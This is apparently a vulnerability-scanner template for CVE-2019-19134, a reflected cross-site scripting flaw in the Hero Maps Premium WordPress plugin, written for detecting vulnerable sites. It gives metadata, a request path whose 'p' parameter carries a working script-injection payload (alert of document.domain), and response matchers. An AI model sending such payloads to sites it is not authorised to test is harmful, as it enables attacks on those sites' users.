id: CVE-2019-19134 info: name: Hero Maps Premium < 2.2.3 - Unauthenticated Reflected Cross-Site Scripting (XSS) author: daffainfo severity: medium description: The Hero Maps Premium plugin 2.2.1 and prior for WordPress is prone to unauthenticated XSS via the views/dashboard/index.php p parameter because it fails to sufficiently sanitize user-supplied input - https://wpscan.com/vulnerability/24b83ce5-e3b8-4262-b087-a2dfec014985 reference: - https://wpscan.com/vulnerability/d179f7fe-e3e7-44b3-9bf8-aab2e90dbe01 - https://www.hooperlabs.xyz/disclosures/cve-2019-19134.php - https://heroplugins.com/product/maps/ - https://heroplugins.com/changelogs/hmaps/changelog.txt classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cve-id: CVE-2019-19134 cwe-id: CWE-79 tags: cve,cve2019,wordpress,xss,wp-plugin,maps requests: - method: GET path: - '{{BaseURL}}/wp-content/plugins/hmapsprem/views/dashboard/index.php?p=/wp-content/plugins/hmapsprem/foo%22%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E' matchers-condition: and matchers: - type: word words: - 'foo">' part: body - type: word part: header words: - text/html - type: status status: - 200